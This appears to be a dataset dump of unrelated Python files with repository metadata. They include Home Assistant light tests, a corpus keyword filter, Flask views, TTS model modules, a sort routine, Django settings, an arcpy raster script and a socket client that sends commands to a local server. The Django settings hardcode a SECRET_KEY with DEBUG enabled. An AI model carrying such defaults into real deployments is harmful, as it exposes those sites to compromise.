|
"""Tests for the Abode light device."""
from homeassistant.components.abode import ATTR_DEVICE_ID
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_COLOR_TEMP,
ATTR_RGB_COLOR,
DOMAIN as LIGHT_DOMAIN,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_FRIENDLY_NAME,
ATTR_SUPPORTED_FEATURES,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_ON,
)
from .common import setup_platform
from tests.async_mock import patch
DEVICE_ID = "light.living_room_lamp"
async def test_entity_registry(hass):
"""Tests that the devices are registered in the entity registry."""
await setup_platform(hass, LIGHT_DOMAIN)
entity_registry = await hass.helpers.entity_registry.async_get_registry()
entry = entity_registry.async_get(DEVICE_ID)
assert entry.unique_id == "741385f4388b2637df4c6b398fe50581"
async def test_attributes(hass):
"""Test the light attributes are correct."""
await setup_platform(hass, LIGHT_DOMAIN)
state = hass.states.get(DEVICE_ID)
assert state.state == STATE_ON
assert state.attributes.get(ATTR_BRIGHTNESS) == 204
assert state.attributes.get(ATTR_RGB_COLOR) == (0, 63, 255)
assert state.attributes.get(ATTR_COLOR_TEMP) == 280
assert state.attributes.get(ATTR_DEVICE_ID) == "ZB:db5b1a"
assert not state.attributes.get("battery_low")
assert not state.attributes.get("no_response")
assert state.attributes.get("device_type") == "RGB Dimmer"
assert state.attributes.get(ATTR_FRIENDLY_NAME) == "Living Room Lamp"
assert state.attributes.get(ATTR_SUPPORTED_FEATURES) == 19
async def test_switch_off(hass):
"""Test the light can be turned off."""
await setup_platform(hass, LIGHT_DOMAIN)
with patch("abodepy.AbodeLight.switch_off") as mock_switch_off:
assert await hass.services.async_call(
LIGHT_DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: DEVICE_ID}, blocking=True
)
await hass.async_block_till_done()
mock_switch_off.assert_called_once()
async def test_switch_on(hass):
"""Test the light can be turned on."""
await setup_platform(hass, LIGHT_DOMAIN)
with patch("abodepy.AbodeLight.switch_on") as mock_switch_on:
await hass.services.async_call(
LIGHT_DOMAIN, SERVICE_TURN_ON, {ATTR_ENTITY_ID: DEVICE_ID}, blocking=True
)
await hass.async_block_till_done()
mock_switch_on.assert_called_once()
async def test_set_brightness(hass):
"""Test the brightness can be set."""
await setup_platform(hass, LIGHT_DOMAIN)
with patch("abodepy.AbodeLight.set_level") as mock_set_level:
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: DEVICE_ID, "brightness": 100},
blocking=True,
)
await hass.async_block_till_done()
# Brightness is converted in abode.light.AbodeLight.turn_on
mock_set_level.assert_called_once_with(39)
async def test_set_color(hass):
"""Test the color can be set."""
await setup_platform(hass, LIGHT_DOMAIN)
with patch("abodepy.AbodeLight.set_color") as mock_set_color:
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: DEVICE_ID, "hs_color": [240, 100]},
blocking=True,
)
await hass.async_block_till_done()
mock_set_color.assert_called_once_with((240.0, 100.0))
async def test_set_color_temp(hass):
"""Test the color temp can be set."""
await setup_platform(hass, LIGHT_DOMAIN)
with patch("abodepy.AbodeLight.set_color_temp") as mock_set_color_temp:
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: DEVICE_ID, "color_temp": 309},
blocking=True,
)
await hass.async_block_till_done()
# Color temp is converted in abode.light.AbodeLight.turn_on
mock_set_color_temp.assert_called_once_with(3236)
|
[
"[email protected]"
] | |
5efc101cdbf8e412920f0ccebaf0c2a572e6f7ba
|
af6e7f0927517375cb4af833f4c52e301bad0af5
|
/corpus_processor/topic_aware/filter_qa_corpus_by_topic_list.py
|
90d3fa8fa6d532a86b504d45378701a28a47ca24
|
[] |
no_license
|
wolfhu/DialogPretraining
|
470334fd815e1299981b827fdc933d237a489efd
|
eeeada92146d652d81ca6e961d1298924ac8435d
|
refs/heads/main
| 2023-06-25T15:22:54.728187 | 2021-07-21T01:40:23 | 2021-07-21T01:40:23 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,834 |
py
|
# encoding: utf-8
import sys
from util.trie import Trie
tag_file_path = '/home/t-yuniu/xiaoice/yuniu/dataset/processed/domain/sport/keywords'
# Tag 黑名单
tag_black_dict = {}
# tag_black_dict.setdefault('游戏', True)
tag_trie = Trie()
def detect_tag(sentence):
"""
Judge if sentence contain as least a tag.
:param sentence: query or answer
:return: boolean, True if contain, False otherwise.
"""
length = len(sentence)
detected_tags = []
for idx in range(length):
node = tag_trie.lookup
idx_tmp = idx
while True:
if idx_tmp >= length:
break
if sentence[idx_tmp] in node:
node = node[sentence[idx_tmp]]
idx_tmp += 1
if Trie.END in node:
detected_tags.append(sentence[idx:idx_tmp])
else:
break
return detected_tags
if __name__ == '__main__':
# build trie from tag file
with open(tag_file_path) as douban_tag_file:
for line in douban_tag_file.readlines():
tag = line.strip()
if len(tag) == 1 or tag in tag_black_dict:
continue
tag_trie.insert(tag)
# filter corpus contain tags
while True:
line = sys.stdin.readline().strip()
if line:
try:
line = line.replace('#', '')
query, answer = line.split('\t')[:2]
# detected_tags = detect_tag(query)
detected_tags = []
detected_tags.extend(detect_tag(answer))
if len(detected_tags) > 0:
print('\t'.join([' '.join(set(detected_tags)), query, answer]))
except ValueError:
sys.stdout.write('Illegal line.\n')
else:
break
|
[
"[email protected]"
] | |
94e3d38dd3a5674a0272aeb4ea010d9f7a9abfd2
|
7dcdd5de0640f07b01b1707c134ec0bd168f641d
|
/fedora_college/modules/content/views.py
|
b1019c221326d657588aa1b01f790aaa7115edba
|
[
"BSD-3-Clause"
] |
permissive
|
MSheezan/fedora-college
|
8e3e741f6ddac481c2bb7bbcde1e70e2b4b56774
|
07dbce3652c6c1796fb0f7b208a706c9e9d90dc1
|
refs/heads/master
| 2021-01-15T22:38:16.831830 | 2014-06-26T07:04:33 | 2014-06-26T07:04:33 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,439 |
py
|
# -*- coding: utf-8 -*-
import re
#import time
from unicodedata import normalize
from flask import Blueprint, render_template
from flask import redirect, url_for, g
from sqlalchemy import desc
from fedora_college.core.database import db
from fedora_college.modules.content.forms import * # noqa
from fedora_college.core.models import * # noqa
from flask_fas_openid import fas_login_required
bundle = Blueprint('content', __name__, template_folder='templates')
from fedora_college.modules.content.media import * # noqa
_punct_re = re.compile(r'[\t !"#$%&\'()*\-/<=>?@\[\\\]^_`{|},.]+')
def slugify(text, delim=u'-'):
"""Generates an slightly worse ASCII-only slug."""
#stri = (time.strftime("%d/%m/%Y"))
#text = stri + "-" + text
result = []
for word in _punct_re.split(text.lower()):
word = normalize('NFKD', word).encode('ascii', 'ignore')
if word:
result.append(word)
return unicode(delim.join(result))
def attach_tags(tags, content):
rem = TagsMap.query.filter_by(content_id=content.content_id).all()
for r in rem:
db.session.delete(r)
db.session.commit()
for tag in tags:
tag_db = Tags.query.filter_by(tag_text=tag).first()
if tag_db is None:
tag_db = Tags(tag)
db.session.add(tag_db)
db.session.commit()
Map = TagsMap(tag_db.tag_id, content.content_id)
db.session.add(Map)
db.session.commit()
@bundle.route('/content/add/', methods=['GET', 'POST'])
@bundle.route('/content/add', methods=['GET', 'POST'])
@bundle.route('/content/edit/<posturl>/', methods=['GET', 'POST'])
@bundle.route('/content/edit/<posturl>', methods=['GET', 'POST'])
@fas_login_required
def addcontent(posturl=None):
form = CreateContent()
form_action = url_for('content.addcontent')
media = Media.query.order_by(desc(Media.timestamp)).limit(10).all()
if posturl is not None:
content = Content.query.filter_by(slug=posturl).first_or_404()
form = CreateContent(obj=content)
if form.validate_on_submit():
form.populate_obj(content)
tags = str(form.tags.data).split(',')
attach_tags(tags, content)
content.rehtml()
db.session.commit()
return redirect(url_for('content.addcontent',
posturl=posturl,
updated="Successfully updated")
)
else:
if form.validate_on_submit():
url_name = slugify(form.title.data)
query = Content(form.title.data,
url_name,
form.description.data,
form.active.data,
form.tags.data,
g.fas_user['username'],
form.type_content.data
)
tags = str(form.tags.data).split(',')
try:
db.session.add(query)
db.session.commit()
attach_tags(tags, query)
return redirect(url_for('content.addcontent',
posturl=url_name,
updated="Successfully updated",
media=media)
)
# Duplicate entry
except Exception as e:
db.session.rollback()
print e
pass
return render_template('content/edit_content.html', form=form,
form_action=form_action, title="Create Content",
media=media)
@bundle.route('/blog', methods=['GET', 'POST'])
@bundle.route('/blog/', methods=['GET', 'POST'])
@bundle.route('/blog/<slug>/', methods=['GET', 'POST'])
@bundle.route('/blog/<slug>', methods=['GET', 'POST'])
def blog(slug=None):
if slug is not None:
try:
posts = Content.query. \
filter_by(slug=slug).all()
except:
posts = "No such posts in database."
else:
try:
posts = Content.query. \
filter_by(type_content="blog").all()
except:
posts = "Databse is empty"
return render_template('blog/index.html',
title='Blog',
content=posts)
|
[
"[email protected]"
] | |
c2eab84e232f590469f2bb0cea19a803ec121d0f
|
2fabc9255adbe1cc055eb4b2402f8526f389f257
|
/model/modules.py
|
86464633b715d37b344f74882941fce2b5d70ab8
|
[
"MIT"
] |
permissive
|
asr2021/WaveGrad2
|
657323be12d16667fc0a3b7f2a168101e6e913cb
|
ba7715d760999093dd99283f48971c5115210b51
|
refs/heads/main
| 2023-06-02T18:48:56.830462 | 2021-06-23T07:22:10 | 2021-06-23T08:10:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,959 |
py
|
import os
import torch
import torch.nn as nn
import numpy as np
import torch.nn.functional as F
from .blocks import (
ZoneOutBiLSTM,
LinearNorm,
ConvBlock,
)
from text.symbols import symbols
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class TextEncoder(nn.Module):
""" Text Encoder """
def __init__(self, config):
super(TextEncoder, self).__init__()
n_src_vocab = len(symbols) + 1
d_word_vec = config["transformer"]["encoder_hidden"]
n_layers = config["transformer"]["encoder_layer"]
d_model = config["transformer"]["encoder_hidden"]
kernel_size = config["transformer"]["encoder_kernel_size"]
dropout = config["transformer"]["encoder_dropout"]
zoneout = config["transformer"]["encoder_zoneout"]
self.d_model = d_model
self.src_word_emb = nn.Embedding(
n_src_vocab, d_word_vec, padding_idx=0
)
self.conv_stack = nn.ModuleList(
[
ConvBlock(
d_model, d_model, kernel_size=kernel_size, dropout=dropout
)
for _ in range(n_layers)
]
)
self.lstm = ZoneOutBiLSTM(
d_model, zoneout_rate=zoneout
)
def forward(self, src_seq, mask=None):
enc_output = self.src_word_emb(src_seq)
for conv in self.conv_stack:
enc_output = conv(enc_output, mask=mask)
enc_output = self.lstm(enc_output)
if mask is not None:
enc_output = enc_output.masked_fill(mask.unsqueeze(-1), 0.)
return enc_output
class VarianceAdaptor(nn.Module):
""" Variance Adaptor """
def __init__(self, preprocess_config, model_config):
super(VarianceAdaptor, self).__init__()
self.duration_predictor = DurationPredictor(model_config)
self.gaussian_upsampling = GaussianUpsampling(model_config)
def forward(
self,
x,
src_mask,
duration_target=None,
d_control=1.0,
):
log_duration_prediction = self.duration_predictor(x, src_mask)
if duration_target is not None:
x, attn = self.gaussian_upsampling(x, duration_target, src_mask)
duration_rounded = duration_target
else:
duration_rounded = torch.clamp(
(torch.round(torch.exp(log_duration_prediction) - 1) * d_control),
min=0,
)
x, attn = self.gaussian_upsampling(x, duration_rounded, src_mask)
return (
x,
log_duration_prediction,
duration_rounded,
attn,
)
class GaussianUpsampling(nn.Module):
""" Gaussian Upsampling """
def __init__(self, model_config):
super(GaussianUpsampling, self).__init__()
# self.range_param_predictor = RangeParameterPredictor(model_config)
def forward(self, encoder_outputs, duration, mask):
device = encoder_outputs.device
# range_param = self.range_param_predictor(encoder_outputs, duration, mask)
t = torch.sum(duration, dim=-1, keepdim=True) #[B, 1]
e = torch.cumsum(duration, dim=-1).float() #[B, L]
c = e - 0.5 * duration #[B, L]
t = torch.arange(1, torch.max(t).item()+1, device=device) # (1, ..., T)
t = t.unsqueeze(0).unsqueeze(1) #[1, 1, T]
c = c.unsqueeze(2)
# print(range_param, 0.1*(range_param ** 2))
# w_1 = torch.exp(-0.1*(range_param.unsqueeze(-1) ** -2) * (t - c) ** 2) # [B, L, T]
# w_2 = torch.sum(torch.exp(-0.1*(range_param.unsqueeze(-1) ** -2) * (t - c) ** 2), dim=1, keepdim=True) # [B, 1, T]
w_1 = torch.exp(-0.1 * (t - c) ** 2) # [B, L, T]
w_2 = torch.sum(torch.exp(-0.1 * (t - c) ** 2), dim=1, keepdim=True) # [B, 1, T]
w_2[w_2==0.] = 1.
# w_1 = self.normpdf(t, c, range_param.unsqueeze(-1)) # [B, L, T]
# w_1 = torch.distributions.normal.Normal(c, 0.1).log_prob(t) # [B, L, T]
# w_2 = torch.sum(w_1, dim=1, keepdim=True) # [B, 1, T]
# w_2[w_2==0.] = 1.
w = w_1 / w_2
out = torch.matmul(w.transpose(1, 2), encoder_outputs)
return out, w
class DurationPredictor(nn.Module):
""" Duration Parameter Predictor """
def __init__(self, model_config):
super(DurationPredictor, self).__init__()
encoder_hidden = model_config["transformer"]["encoder_hidden"]
variance_hidden = model_config["variance_predictor"]["variance_hidden"]
self.duration_lstm = nn.LSTM(
encoder_hidden,
int(variance_hidden / 2), 2,
batch_first=True, bidirectional=True
)
self.duration_proj = nn.Sequential(
LinearNorm(variance_hidden, 1),
nn.ReLU(),
)
def forward(self, encoder_output, mask):
duration_prediction, _ = self.duration_lstm(encoder_output)
duration_prediction = self.duration_proj(duration_prediction)
duration_prediction = duration_prediction.squeeze(-1) # [B, L]
if mask is not None:
duration_prediction = duration_prediction.masked_fill(mask, 0.0)
return duration_prediction
# class RangeParameterPredictor(nn.Module):
# """ Range Parameter Predictor """
# def __init__(self, model_config):
# super(RangeParameterPredictor, self).__init__()
# encoder_hidden = model_config["transformer"]["encoder_hidden"]
# variance_hidden = model_config["variance_predictor"]["variance_hidden"]
# self.range_param_lstm = nn.LSTM(
# encoder_hidden + 1,
# int(variance_hidden / 2), 2,
# batch_first=True, bidirectional=True
# )
# self.range_param_proj = nn.Sequential(
# LinearNorm(variance_hidden, 1),
# nn.Softplus(),
# )
# def forward(self, encoder_output, duration, mask):
# range_param_input = torch.cat([encoder_output, duration.unsqueeze(-1)], dim=-1)
# range_param_prediction, _ = self.range_param_lstm(range_param_input)
# range_param_prediction = self.range_param_proj(range_param_prediction)
# range_param_prediction = range_param_prediction.squeeze(-1) # [B, L]
# if mask is not None:
# range_param_prediction = range_param_prediction.masked_fill(mask, 0.0)
# return range_param_prediction
class SamplingWindow(nn.Module):
""" Sampling Window """
def __init__(self, model_config, train_config):
super(SamplingWindow, self).__init__()
self.upsampling_rate = model_config["wavegrad"]["upsampling_rate"]
self.segment_length_up = train_config["window"]["segment_length"]
self.segment_length = train_config["window"]["segment_length"] // self.upsampling_rate
def pad_seq(self, seq, segment_length):
if len(seq.shape) > 2:
return torch.nn.functional.pad(
seq.transpose(-2, -1), (0, segment_length - seq.shape[1]), 'constant'
).data.transpose(-2, -1)
return torch.nn.functional.pad(
seq, (0, segment_length - seq.shape[1]), 'constant'
).data
def get_hidden_segment(self, hiddens, seq_starts):
batch = list()
for i, (hidden, seq_start) in enumerate(zip(hiddens, seq_starts)):
batch.append(hidden[seq_start:seq_start+self.segment_length])
return torch.stack(batch)
def forward(self, encoder_output, audio, seq_starts=None, full_len=False):
if full_len:
return encoder_output, audio
if encoder_output.shape[1] > self.segment_length:
encoder_segment = self.get_hidden_segment(encoder_output, seq_starts)
encoder_segment = self.pad_seq(encoder_output, self.segment_length)
audio_segment = self.pad_seq(audio, self.segment_length_up)
return encoder_segment, audio_segment
|
[
"[email protected]"
] | |
166670300dc3fb39d4e1883bb546d056fe08ce1f
|
dd09f3ad02785935043b56ea3ef85ed603f4065d
|
/Sorting_Function/Selection_Sorting.py
|
6f03147ffab2db72cf7d3f242eb1efd76270e240
|
[] |
no_license
|
RishavMishraRM/Data_Structure
|
ed70f5a04c2fa8153433e830ef54deb7b9c8bf21
|
0d31d16b48989359d5fef79b00aac1b9ca112a22
|
refs/heads/main
| 2023-06-27T02:40:18.031146 | 2021-07-25T19:01:51 | 2021-07-25T19:01:51 | 330,320,897 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 365 |
py
|
def selection_sort(A):
n = len(A)
for i in range(n-1):
position = i
for j in range(i+1, n):
if A[j] < A[position]:
position = j
temp = A[i]
A[i] = A[position]
A[position] = temp
A = [3, 5, 8, 9, 6, 2]
print('Original Array:',A)
selection_sort(A)
print('Sorted Array:',A)
|
[
"[email protected]"
] | |
2fb93afe829de7491a458ced6b6568ea178817ff
|
488e0934b8cd97e202ae05368c855a57b299bfd1
|
/Django/advanced/change_admin/change_admin/settings.py
|
52ac0975d8daac947ffc100a34d19c9282aa57ff
|
[] |
no_license
|
didemertens/udemy_webdev
|
4d96a5e7abeec1848ecedb97f0c440cd50eb27ac
|
306215571be8e4dcb939e79b18ff6b302b75c952
|
refs/heads/master
| 2020-04-25T00:24:45.654136 | 2019-04-13T16:00:47 | 2019-04-13T16:00:47 | 172,377,429 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,184 |
py
|
"""
Django settings for change_admin project.
Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATE_DIR = os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '(w#6#!6oi75z@e2d&((yalznx95yk7exe5fbbx#f1l#0uc=(3w'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app_videos'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'change_admin.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'change_admin.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
|
[
"[email protected]"
] | |
94469e411f69931b1aa7dec9d60e62e9d87a7eff
|
3e917645a0e1375189c8ee8c1e93ed15348111ef
|
/projects/usxp/archive/parrallel/parallel_nibble_v2.py
|
792bbb8be009b4feb157af5c7e2bf1c7bf54ad07
|
[] |
no_license
|
mbougie/gibbs
|
d4544e688ce2b63530535e1f5102328aece30e0d
|
39d5dc0866fc0dd149d0cf1f22bfd20911a9d29e
|
refs/heads/master
| 2021-01-12T06:59:27.214123 | 2020-01-07T15:48:12 | 2020-01-07T15:48:12 | 83,906,717 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,710 |
py
|
import arcpy
from arcpy import env
from arcpy.sa import *
import multiprocessing
import os
import glob
import sys
import time
import logging
from multiprocessing import Process, Queue, Pool, cpu_count, current_process, Manager
import general as gen
# arcpy.env.overwriteOutput = True
arcpy.env.scratchWorkspace = "in_memory"
case=['Bougie','Gibbs']
#import extension
arcpy.CheckOutExtension("Spatial")
#establish root path for this the main project (i.e. usxp)
rootpath = 'C:/Users/Bougie/Desktop/Gibbs/data/usxp/'
# rootpath = 'D:/projects/ksu/v2/'
### establish gdb path ####
def defineGDBpath(arg_list):
gdb_path = '{}{}/{}/{}.gdb/'.format(rootpath,arg_list[0],arg_list[1],arg_list[2])
# print 'gdb path: ', gdb_path
return gdb_path
####### define raster and mask ####################
class ProcessingObject(object):
def __init__(self, series, res, mmu, years, name, subname, pixel_type, gdb_parent, parent_seq, gdb_child, mask_seq, outraster_seq):
self.series = series
self.res = str(res)
self.mmu =str(mmu)
self.years = years
self.name = name
self.subname = subname
self.parent_seq = parent_seq
self.mask_seq = mask_seq
self.outraster_seq = outraster_seq
self.datarange = str(self.years[0])+'to'+str(self.years[1])
print 'self.datarange:', self.datarange
self.dir_tiles = 'C:/Users/Bougie/Desktop/Gibbs/tiles/'
# s9_ytc30_2008to2016_mmu5_nbl_bfc
if self.name == 'mtr':
self.traj = self.series+'_traj_cdl'+self.res+'_b_'+self.datarange+'_rfnd'
self.gdb_parent = defineGDBpath(gdb_parent)
self.raster_parent = self.traj+self.parent_seq
self.path_parent = self.gdb_parent + self.raster_parent
print 'self.path_parent', self.path_parent
self.gdb_child = defineGDBpath(gdb_child)
self.raster_mask = self.raster_parent + self.mask_seq
self.path_mask = self.gdb_child + self.raster_mask
self.raster_nbl = self.raster_parent + self.outraster_seq
self.path_nbl = self.gdb_child + self.raster_nbl
print 'self.path_nbl', self.path_nbl
self.out_fishnet = defineGDBpath(['ancillary','vector', 'shapefiles']) + 'fishnet_mtr'
print self.out_fishnet
self.pixel_type = "16_BIT_UNSIGNED"
else:
self.gdb_parent = defineGDBpath(['s14', 'post', self.name])
self.yxc_foundation = self.series+'_'+self.name+self.res+'_'+self.datarange+'_mmu'+self.mmu
print 'self.yxc_foundation', self.yxc_foundation
self.path_parent = self.gdb_parent + self.yxc_foundation
print 'self.path_parent', self.path_parent
self.raster_mask = self.yxc_foundation + '_msk'
self.path_mask = self.gdb_parent + self.raster_mask
print 'self.path_mask', self.path_mask
self.out_fishnet = defineGDBpath(['ancillary','vector', 'shapefiles']) + 'fishnet_ytc'
self.pixel_type = "16_BIT_UNSIGNED"
self.raster_nbl = self.yxc_foundation + '_nbl'
print 'self.raster_nbl:', self.raster_nbl
self.path_nbl = self.gdb_parent + self.raster_nbl
print 'self.path_nbl', self.path_nbl
# def existsDataset(self):
# dataset = self.gdb_parent + self.raster_parent + '_nbl'
# if arcpy.Exists(dataset):
# print 'dataset already exists'
# return
# else:
# print 'dataset: ', dataset
# return self.raster_parent + '_nbl'
def create_fishnet():
#delete previous fishnet feature class
arcpy.Delete_management(nibble.out_fishnet)
#acquire parameters for creatfisnet function
XMin = nibble.path_parent.extent.XMin
YMin = nibble.path_parent.extent.YMin
XMax = nibble.path_parent.extent.XMax
YMax = nibble.path_parent.extent.YMax
origCord = "{} {}".format(XMin, YMin)
YAxisCord = "{} {}".format(XMin, YMax)
cornerCord = "{} {}".format(XMax, YMax)
cellSizeW = "0"
cellSizeH = "0"
numRows = 7
numCols = 7
geotype = "POLYGON"
arcpy.env.outputCoordinateSystem = nibble.path_parent.spatialReference
print nibble.path_parent.spatialReference.name
#call CreateFishnet_management function
arcpy.CreateFishnet_management(nibble.out_fishnet, origCord, YAxisCord, cellSizeW, cellSizeH, numRows, numCols, cornerCord, "NO_LABELS", "", geotype)
def execute_task(args):
in_extentDict, nibble = args
fc_count = in_extentDict[0]
# print fc_count
procExt = in_extentDict[1]
# print procExt
XMin = procExt[0]
YMin = procExt[1]
XMax = procExt[2]
YMax = procExt[3]
#set environments
#The brilliant thing here is that using the extents with the full dataset!!!!!! DONT EVEN NEED TO CLIP THE FULL RASTER TO THE FISHNET BECASUE
arcpy.env.snapRaster = nibble.path_parent
arcpy.env.cellsize = nibble.path_parent
arcpy.env.extent = arcpy.Extent(XMin, YMin, XMax, YMax)
### Execute Nibble #####################
ras_out = arcpy.sa.Nibble(nibble.path_parent, nibble.path_mask, "DATA_ONLY")
#clear out the extent for next time
arcpy.ClearEnvironment("extent")
# print fc_count
outname = "tile_" + str(fc_count) +'.tif'
#create Directory
outpath = os.path.join("C:/Users/Bougie/Desktop/Gibbs/", r"tiles", outname)
ras_out.save(outpath)
def mosiacRasters(nibble):
tilelist = glob.glob(nibble.dir_tiles+'*.tif')
print tilelist
######mosiac tiles together into a new raster
arcpy.MosaicToNewRaster_management(tilelist, nibble.gdb_parent, nibble.raster_nbl, Raster(nibble.path_parent).spatialReference, nibble.pixel_type, nibble.res, "1", "LAST","FIRST")
##Overwrite the existing attribute table file
arcpy.BuildRasterAttributeTable_management(nibble.path_nbl, "Overwrite")
## Overwrite pyramids
gen.buildPyramids(nibble.path_nbl)
def run(series, res, mmu, years, name, subname, pixel_type, gdb_parent, parent_seq, gdb_child, mask_seq, outraster_seq):
#instantiate the class inside run() function
nibble = ProcessingObject(series, res, mmu, years, name, subname, pixel_type, gdb_parent, parent_seq, gdb_child, mask_seq, outraster_seq)
print nibble.res
# need to create a unique fishnet for each dataset
#create_fishnet()
#remove a files in tiles directory
tiles = glob.glob(nibble.dir_tiles+"*")
for tile in tiles:
os.remove(tile)
#get extents of individual features and add it to a dictionary
extDict = {}
count = 1
for row in arcpy.da.SearchCursor(nibble.out_fishnet, ["SHAPE@"]):
extent_curr = row[0].extent
ls = []
ls.append(extent_curr.XMin)
ls.append(extent_curr.YMin)
ls.append(extent_curr.XMax)
ls.append(extent_curr.YMax)
extDict[count] = ls
count+=1
# print 'extDict', extDict
# print'extDict.items()', extDict.items()
######create a process and pass dictionary of extent to execute task
pool = Pool(processes=cpu_count())
# pool = Pool(processes=1)
pool.map(execute_task, [(ed, nibble) for ed in extDict.items()])
pool.close()
pool.join
mosiacRasters(nibble)
|
[
"[email protected]"
] | |
82d8e508bea9d27e596ec5fd5f94d4d16fc0ca40
|
085406a6754c33957ca694878db9bbe37f84b970
|
/网络编程/08-ssh_socket_client.py
|
b91da548705606b59b6c0eb6b8d70cdbb3050767
|
[] |
no_license
|
dewlytg/Python-example
|
82157958da198ce42014e678dfe507c72ed67ef0
|
1e179e4037eccd9fefabefd252b060564a2eafce
|
refs/heads/master
| 2021-01-01T18:36:08.868861 | 2019-01-18T10:39:08 | 2019-01-18T10:39:08 | 98,375,528 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,041 |
py
|
#!/usr/bin/env python
"""
socket client for ssh
"""
import socket
client = socket.socket()
client.connect(("localhost",9999))
while True:
#支持客户端循环发送数据到服务端
cmd = input(">>:").strip()
if len(cmd) == 0:continue
client.send(cmd.encode()) #python3中必须把字符串转换为bytes类型,这里可以理解字符串类型是utf-8
cmd_res_size = client.recv(1024)
print("命令结果大小:",cmd_res_size)
client.send("please input somthing in order to packet splicing".encode()) #把代码放到Linux执行会发生粘包错误,这个可以避免错误发生
received_size = 0
received_data = b''
while received_size != int(cmd_res_size.decode()): #cmd_res_size是bytes类型的数据,需要使用decode转换为字符串
data = client.recv(1024)
received_size += len(data)
received_data += data
else:
print("cmd res receive done...",received_size)
print(received_data.decode())
client.close()
|
[
"[email protected]"
] | |
5c2482df35a2b3e2793446e744596a4eff53075d
|
920ab19b73a7cba21d340a49d9d24e2d1eeabf3d
|
/idpsreact/bin/automat-visualize
|
518eafa6739f15f864b7d8624057a1b909d8f1e5
|
[
"MIT"
] |
permissive
|
DTrafford/IDPS
|
5fa2b73f2c47cbf50b90a1a786c10f7d69c995b4
|
1eaccfc218adcb7231e64271731c765f8362b891
|
refs/heads/master
| 2022-12-16T16:28:34.801962 | 2020-03-30T18:08:09 | 2020-03-30T18:08:09 | 234,163,829 | 0 | 0 |
MIT
| 2020-09-10T06:26:02 | 2020-01-15T20:10:09 |
Python
|
UTF-8
|
Python
| false | false | 281 |
#!/Users/sangit/Downloads/django-react-boilerplate-master/idpsreact/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from automat._visualize import tool
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(tool())
|
[
"[email protected]"
] | ||
6684ca9dd67bacb41767bd65a1c0c1f2dd8193ce
|
e07f6ac5559d09eb6f5393650af135c7474f5003
|
/recent_news.py
|
e27c23ffb42fa9cdf553ea3b1d714c6870d9ef68
|
[] |
no_license
|
Money-fin/backend
|
21e188f3f59ccaa216d1ea4bb7b78f670831cb6f
|
909961dc33df84ba3663e622bfdf6ab98f915f5f
|
refs/heads/master
| 2022-12-04T08:32:10.094335 | 2020-08-29T09:57:28 | 2020-08-29T09:57:28 | 291,008,543 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,527 |
py
|
import requests
import sys
sys.path.append("/home/jylee/backend")
import urllib
import os
from bs4 import BeautifulSoup
import numpy as np
import pandas as pd
